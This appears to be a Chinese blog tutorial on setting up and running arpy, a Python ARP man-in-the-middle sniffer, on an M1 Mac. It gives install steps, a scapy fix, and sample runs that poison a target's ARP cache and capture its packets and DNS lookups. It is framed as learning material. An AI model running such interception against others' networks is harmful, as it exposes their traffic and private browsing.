Mac-M1 ARP 嗅探工具之arpy
8/6/2022 pyarpy
# Mac-M1 ARP 嗅探工具之 arpy
# 1 Introduction
Arpy 是一个用python编写的arp嗅探工具,他只有短短的200多行代码,通过scapy进行arp攻击,也许在实战用的用处没有太多老牌arp工具好用,但是用来学习他工作模式是一个挺好的例子,其中一个亮点就是配合Gsource可以生成内网的dns查询记录。
Function
- 数据包嗅探
- DNS查询嗅探
- Gsource生成流量记录
Modules
- python
- gource
- scapy
- libdnet
- libpcap
# 2 约定
- Hardware: apple M1
- System: macOS Montery 12.5
- Installed:
- Xcode
- homebrew
- port
1
2
3
2
3
# 3 Install
- python
运行 arpy.py 需要在 python2 环境下,否则会报错,报错内容如下:
File "arpy.py", line 144
print tcpdata
^
SyntaxError: Missing parentheses in call to 'print'. Did you mean print(xxx)?
1
2
3
4
2
3
4
幸运的是,此错误并非不可解决。这是因为,在 python3 的早期版本中,忘记在 print 语句周围包含括号会引发一个错误,该错误仅显示“无效语法”。此消息不明确,因为无效语法可能是由许多问题引起的。因此,Python 引入了新的“缺少括号”错误消息主要来帮助用户。要解决此问题,请将要打印到控制台的所有值括在括号中,即 print xxx -> print(xxx) .
# python2
sudo -i
port install py27-pip
port select --set pip2 pip27
# python3
brew install python@3.10
brew install pip-tools
1
2
3
4
5
6
7
8
9
2
3
4
5
6
7
8
9
brew install boost glew sdl2_image gource
1
# Method.01: default pip2
# pip install scapy
pip2 install scapy
# Method.02: pip3
pip3 install scapy
# Method.03: recommended
git clone https://github.com/secdev/scapy.git
cd scapy
python3 setup.py install
1
2
3
4
5
6
7
8
9
10
11
12
13
2
3
4
5
6
7
8
9
10
11
12
13
4. libdnet
# Method.01: brew
brew install libdnet
# Method.02: port
sudo -i
port install libdnet
1
2
3
4
5
6
7
2
3
4
5
6
7
5. libpcap
brew install libpcap
echo 'export PATH="/opt/homebrew/opt/libpcap/bin:$PATH"' >~./zshrc
source ~/.zshrc
1
2
3
2
3
# Methood.01
git clone https://github.com/ivanvza/arpy.git
cd arpy
cp arpy.py <目标地址>/arpy.py
cd <目标地址>/
1
2
3
4
5
2
3
4
5
在我们获取 arpy.py 之后,我们通过 python2 / python3 && root权限 仍然不能运行,我们会获得如下报错:
File "/opt/local/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/scapy/arch/bpf/core.py", line 155, in attach_filter
raise Scapy_Exception("Can't attach the BPF filter !")
scapy.error.Scapy_Exception: Can't attach the BPF filter !
1
2
3
2
3
我通过 ref1 (opens new window) && ref2 (opens new window) ,得知:
- 猜测是 Scapy 无法检测 en0 的链接类型来设置 802.11 过滤器,因为它将 en0 视为以太网 802.3 接口;
- 配置Scapy可选库
libpcap,运行中conf.use_pcap = True;
由于我并不会python,所以我只是简单的在 arpy.py 脚本中的 def main() 中配置了 scapy.conf.use_pcap = True
def main():
try:
if scapy.conf.use_pcap != 1:
scapy.conf.use_pcap = True
1
2
3
4
2
3
4
7. 验证
➜ arpy git:(master) ✗ sudo python3 arpy.py -t 192.168.221.182 -g 192.168.221.191 -i en0 --sniff
Password:
WARNING: No IPv4 address found on anpi0 !
WARNING: No IPv4 address found on anpi1 !
WARNING: more No IPv4 address found on en3 !
_____
| _ |___ ___ _ _
| | _| . | | |
|__|__|_| | _|_ |
MiTM Tool |_| |___|
v3.15 -@viljoenivan
[Info] Starting Sniffer...
[Info] Enabling IP Forwarding...
[Info] Filter: ((src host 192.168.221.182 or dst host 192.168.221.182))
Target DNS FQDN
[Info] Found the following (IP layer): 192.168.221.182 -> 192.168.221.255
b'P\x02}\xcd=\x02192.168.221.255\x8d\x02device_discover\xff{"deviceId":"{\\"UDID\\":\\"B36EB09F62D4A7141AA9A0B133E29A211372A51D49D433375E662B963B47B7B3\\"}","devicename":"daochi","hicomversion":"3.1.0.0","mode":1,"deviceHash":"70086000200769327","serviceData":"","extendServiceData":"","wlanIp":"192.168.221.182","capabilityBitmap":[71],"type":14,"coapUri":"coap://192.168.221.182/device_discover"}\x00'
[Info] Found the following (IP layer): 192.168.221.191 -> 192.168.221.182
b'@\x02j\x95=\x02192.168.221.182\x8d\x02device_discover\xff{"deviceId":"{\\"UDID\\":\\"4FE2C31FFEA3A9F48F9FB4A12859756E949A38E1F6DCAD9AEE4B5E7052759E7F\\"}","devicename":"Magic3 Pro","type":14,"hicomversion":"3.2.0.0","mode":1,"deviceHash":"0","serviceData":"","wlanIp":"192.168.221.191","capabilityBitmap":[4]}\x00'
[Info] Found the following (IP layer): 192.168.221.191 -> 192.168.221.182
b'@\x02j\x95=\x02192.168.221.182\x8d\x02device_discover\xff{"deviceId":"{\\"UDID\\":\\"4FE2C31FFEA3A9F48F9FB4A12859756E949A38E1F6DCAD9AEE4B5E7052759E7F\\"}","devicename":"Magic3 Pro","type":14,"hicomversion":"3.2.0.0","mode":1,"deviceHash":"0","serviceData":"","wlanIp":"192.168.221.191","capabilityBitmap":[4]}\x00'
[Info] Found the following (IP layer): 192.168.221.182 -> 192.168.221.255
b'P\x02)*=\x02192.168.221.255\x8d\x02device_discover\xff{"deviceId":"{\\"UDID\\":\\"B36EB09F62D4A7141AA9A0B133E29A211372A51D49D433375E662B963B47B7B3\\"}","devicename":"daochi","hicomversion":"3.1.0.0","mode":1,"deviceHash":"70086000200769327","serviceData":"","extendServiceData":"","wlanIp":"192.168.221.182","capabilityBitmap":[71],"type":14,"coapUri":"coap://192.168.221.182/device_discover"}\x00'
[Info] Found the following (IP layer): 192.168.221.191 -> 192.168.221.182
b'@\x02I?=\x02192.168.221.182\x8d\x02device_discover\xff{"deviceId":"{\\"UDID\\":\\"4FE2C31FFEA3A9F48F9FB4A12859756E949A38E1F6DCAD9AEE4B5E7052759E7F\\"}","devicename":"Magic3 Pro","type":14,"hicomversion":"3.2.0.0","mode":1,"deviceHash":"0","serviceData":"","wlanIp":"192.168.221.191","capabilityBitmap":[4]}\x00'
[Info] Found the following (IP layer): 192.168.221.191 -> 192.168.221.182
b'@\x02I?=\x02192.168.221.182\x8d\x02device_discover\xff{"deviceId":"{\\"UDID\\":\\"4FE2C31FFEA3A9F48F9FB4A12859756E949A38E1F6DCAD9AEE4B5E7052759E7F\\"}","devicename":"Magic3 Pro","type":14,"hicomversion":"3.2.0.0","mode":1,"deviceHash":"0","serviceData":"","wlanIp":"192.168.221.191","capabilityBitmap":[4]}\x00'
[Info] Found the following (IP layer): 192.168.221.182 -> 192.168.221.255
b'P\x02\xd4\xf1=\x02192.168.221.255\x8d\x02device_discover\xff{"deviceId":"{\\"UDID\\":\\"B36EB09F62D4A7141AA9A0B133E29A211372A51D49D433375E662B963B47B7B3\\"}","devicename":"daochi","hicomversion":"3.1.0.0","mode":1,"deviceHash":"70086000200769327","serviceData":"","extendServiceData":"","wlanIp":"192.168.221.182","capabilityBitmap":[71],"type":14,"coapUri":"coap://192.168.221.182/device_discover"}\x00'
[Info] Found the following (IP layer): 192.168.221.191 -> 192.168.221.182
b'@\x02\xb2\xfe=\x02192.168.221.182\x8d\x02device_discover\xff{"deviceId":"{\\"UDID\\":\\"4FE2C31FFEA3A9F48F9FB4A12859756E949A38E1F6DCAD9AEE4B5E7052759E7F\\"}","devicename":"Magic3 Pro","type":14,"hicomversion":"3.2.0.0","mode":1,"deviceHash":"0","serviceData":"","wlanIp":"192.168.221.191","capabilityBitmap":[4]}\x00'
[Info] Found the following (IP layer): 192.168.221.191 -> 192.168.221.182
b'@\x02\xb2\xfe=\x02192.168.221.182\x8d\x02device_discover\xff{"deviceId":"{\\"UDID\\":\\"4FE2C31FFEA3A9F48F9FB4A12859756E949A38E1F6DCAD9AEE4B5E7052759E7F\\"}","devicename":"Magic3 Pro","type":14,"hicomversion":"3.2.0.0","mode":1,"deviceHash":"0","serviceData":"","wlanIp":"192.168.221.191","capabilityBitmap":[4]}\x00'
[Info] Found the following (IP layer): 192.168.221.182 -> 192.168.221.191
b'`A\xb2\xfe'
[Info] Found the following (IP layer): 192.168.221.182 -> 192.168.221.191
b'`A\xb2\xfe'
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
到此,就可以愉快的使用 arpy.py 来训练了。
当然,如果想用现成也可以,那么你可以从我fork的分支上来直接拉取代码。
git clone https://github.com/szc3h9/arpy.git
1
# usage
# Sample Commands
ivanvza:~/ > sudo arpy
_____
| _ |___ ___ _ _
| | _| . | | |
|__|__|_| | _|_ |
MiTM Tool |_| |___|
v3.15 -@viljoenivan
Usage: arpy -t <Target IP> -g <Gateway IP> -i <Interface>
ARP MiTM Tool
Options:
-h, --help show this help message and exit
-t TARGET, --target=TARGET
The Target IP
-g GATEWAY, --gateway=GATEWAY
The Gateway
-i INTERFACE, --interface=INTERFACE
Interface to use
--tcp Filters out only tcp traffic
--udp Filters out only udp traffic
-d D_PORT, --destination_port=D_PORT
Filter for a destination port
-s S_PORT, --source_port=S_PORT
Filter for a source port
--sniff Sniff all passing data
--sniff-dns Sniff only searched domains
--sniff-dns-gource Output target's DNS searches in gource format
-v Verbose scapy packet print
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
# Packet Sniff
This is the packet sniffer, it allows you to see your target's traffic.
ivanvza:~/ > sudo arpy -t 192.168.1.3 -g 192.161.1.1 -i en0 --sniff
_____
| _ |___ ___ _ _
| | _| . | | |
|__|__|_| | _|_ |
MiTM Tool |_| |___|
v3.15 -@viljoenivan
[Info] Starting Sniffer...
[Info] Enabling IP Forwarding...
[Info] Filter: ((src host 192.168.1.3 or dst host 192.168.1.3))
[Info] Found the following (IP layer): 192.168.1.3 -> 46.101.34.90
GET / HTTP/1.1
User-Agent: curl/7.37.1
Host: ivanvza.ninja
Accept: */*
[Info] Found the following (IP layer): 46.101.34.90 -> 192.168.1.3
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Type: text/html
Accept-Ranges: bytes
ETag: "2719538271"
Last-Modified: Thu, 30 Apr 2015 08:25:15 GMT
Content-Length: 3213
Date: Fri, 29 May 2015 20:15:06 GMT
Server: Microsoft IIS
<html>
<title>><></title>
<body>
<pre style="line-height: 1.25; white-space: pre;">
\ SORRY /
\ /
\ This page does /
] not exist yet. [ ,'|
] [ / |
]___ ___[ ,' |
] ]\ /[ [ |: |
] ] \ / [ [ |: |
] ] ] [ [ [ |: |
] ] ]__ __[ [ [ |: |
] ] ] ]\ _ /[ [ [ [ |: |
] ] ] ] (#) [ [ [ [ :===='
] ] ]_].nHn.[_[ [ [
] ] ] HHHHH. [ [ [
] ] / `HH("N \ [ [
]__]/ HHH " \[__[
] NNN [
] N/" [
] N H [
/ N \
/ q, \
/ \
</pre>
<h3 id="list"><h3>
</body>
<script>
// NOTE: window.RTCPeerConnection is "not a constructor" in FF22/23
var RTCPeerConnection = /*window.RTCPeerConnection ||
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
# DNS Sniff
This function allows you to see domain names that your target is currently requesting.
ivanvza:~/ > sudo arpy -t 192.168.1.4 -g 192.168.1.1 -i en0 --sniff-dns
_____
| _ |___ ___ _ _
| | _| . | | |
|__|__|_| | _|_ |
MiTM Tool |_| |___|
- @viljoenivan
[Info] Starting DNS Sniffer...
[Info] Enabling IP Forwarding...
[Info] Done...
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: www.youtube.com.
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: s2.googleusercontent.com.
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: google.com.
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: s.ytimg.com.
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: fonts.gstatic.com.
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: yt3.ggpht.com.
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: i.ytimg.com.
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: safebrowsing.google.com.
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: safebrowsing-cache.google.com.
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: safebrowsing-cache.google.com.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
# DNS Sniff With Gource
This function is more or less the same as the above, however it provides the functionality to pass it through Gource to get a live feed of what your target is viewing.
ivanvza:~/ > sudo arpy -t 192.168.1.3 -g 192.161.1.1 -i en0 --sniff-dns-gource
[INFO] For a live gource feed run this command in parallel with this one:
tail -f /tmp/36847parsed_nmap | tee /dev/stderr | gource -log-format custom -a 1 --file-idle-time 0 -
[Info] Filter: ((src host 192.168.1.3 or dst host 192.168.1.3) and dst port 53)
1
2
3
4
5
6
2
3
4
5
6
# Sample Gource footage
# To-do
- Look at adding sslstrip.
- Port it too kali.